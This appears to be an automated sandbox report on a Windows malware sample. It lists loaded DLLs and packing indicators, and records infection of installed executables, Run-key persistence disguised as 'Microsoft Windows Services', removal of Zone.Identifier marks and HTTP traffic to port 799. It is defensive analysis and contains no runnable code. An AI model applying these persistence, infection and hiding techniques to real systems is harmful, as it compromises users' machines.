Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: msimg32.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: secur32.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: sspicli.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: msasn1.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: uxtheme.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: windows.storage.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: wldp.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: wininet.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: urlmon.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: iertutil.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: srvcli.dll
Source: C:\Windows\94000696690303050\winsvcs.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: C:\Us .pdb source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Unpacked PE file: 0.2.LisectAVT_2403002B_290.exe.400000.0.unpack .text:ER;.text1:ER;.rdata:R;.data:W;.data1:W;.trace:R;.rsrc:R;.reloc:R;1uD:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Unpacked PE file: 1.2.XBVdJN.exe.610000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Windows\94000696690303050\winsvcs.exe	Unpacked PE file: 9.2.winsvcs.exe.400000.0.unpack .text:ER;.text1:ER;.rdata:R;.data:W;.data1:W;.trace:R;.rsrc:R;.reloc:R;1uD:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Unpacked PE file: 10.2.XBVdJN.exe.6e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Windows\94000696690303050\winsvcs.exe	Unpacked PE file: 14.2.winsvcs.exe.400000.0.unpack .text:ER;.text1:ER;.rdata:R;.data:W;.data1:W;.trace:R;.rsrc:R;.reloc:R;1uD:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Unpacked PE file: 15.2.XBVdJN.exe.180000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Unpacked PE file: 0.2.LisectAVT_2403002B_290.exe.400000.0.unpack
Source: C:\Windows\94000696690303050\winsvcs.exe	Unpacked PE file: 9.2.winsvcs.exe.400000.0.unpack
Source: C:\Windows\94000696690303050\winsvcs.exe	Unpacked PE file: 14.2.winsvcs.exe.400000.0.unpack

Source: initial sample

Static PE information: section where entry point is pointing to: 1uD

Source: LisectAVT_2403002B_290.exe	Static PE information: section name: .text1
Source: LisectAVT_2403002B_290.exe	Static PE information: section name: .data1
Source: LisectAVT_2403002B_290.exe	Static PE information: section name: .trace
Source: LisectAVT_2403002B_290.exe	Static PE information: section name: 1uD
Source: winsvcs.exe.0.dr	Static PE information: section name: .text1
Source: winsvcs.exe.0.dr	Static PE information: section name: .data1
Source: winsvcs.exe.0.dr	Static PE information: section name: .trace
Source: winsvcs.exe.0.dr	Static PE information: section name: 1uD
Source: XBVdJN.exe.0.dr	Static PE information: section name: .aspack
Source: XBVdJN.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u
Source: Windows Archive Manager.exe.6.dr	Static PE information: section name: .text1
Source: Windows Archive Manager.exe.6.dr	Static PE information: section name: .data1
Source: Windows Archive Manager.exe.6.dr	Static PE information: section name: .trace
Source: Windows Archive Manager.exe.6.dr	Static PE information: section name: 1uD

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_004047C0 push eax; ret	0_2_004047EE
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00426F13 push ecx; ret	0_2_00426F26
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00426FF1 push ecx; ret	0_2_00427004
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_00611638 push dword ptr [00613084h]; ret	1_2_0061170E
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_0061600A push ebp; ret	1_2_0061600D
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_00616014 push 006114E1h; ret	1_2_00616425
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_00612D9B push ecx; ret	1_2_00612DAB
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_004047C0 push eax; ret	6_2_004047EE
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00426F13 push ecx; ret	6_2_00426F26
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00426FF1 push ecx; ret	6_2_00427004
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00426F13 push ecx; ret	9_2_00426F26
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00426FF1 push ecx; ret	9_2_00427004
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E1638 push dword ptr [006E3084h]; ret	10_2_006E170E
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E600A push ebp; ret	10_2_006E600D
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E2D9B push ecx; ret	10_2_006E2DAB
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E6014 push 006E14E1h; ret	10_2_006E6425
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00426F13 push ecx; ret	14_2_00426F26
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00426FF1 push ecx; ret	14_2_00427004
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_00181638 push dword ptr [00183084h]; ret	15_2_0018170E
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_00182D9B push ecx; ret	15_2_00182DAB
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_00186014 push 001814E1h; ret	15_2_00186425
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_0018600A push ebp; ret	15_2_0018600D

Source: LisectAVT_2403002B_290.exe	Static PE information: section name: 1uD entropy: 6.934614473647855
Source: winsvcs.exe.0.dr	Static PE information: section name: 1uD entropy: 6.934614473647855
Source: XBVdJN.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934551397583471
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.9345101913280525
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934760602123565
Source: Windows Archive Manager.exe.6.dr	Static PE information: section name: 1uD entropy: 6.934614473647855

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Executable created and started: C:\Windows\94000696690303050\winsvcs.exe

Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\94000696690303050\winsvcs.exe	File created: C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	File created: C:\Windows\94000696690303050\winsvcs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	File created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

File created: C:\Windows\94000696690303050\winsvcs.exe

Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	File opened: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\94000696690303050\winsvcs.exe	File opened: C:\Windows\94000696690303050\winsvcs.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 799

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
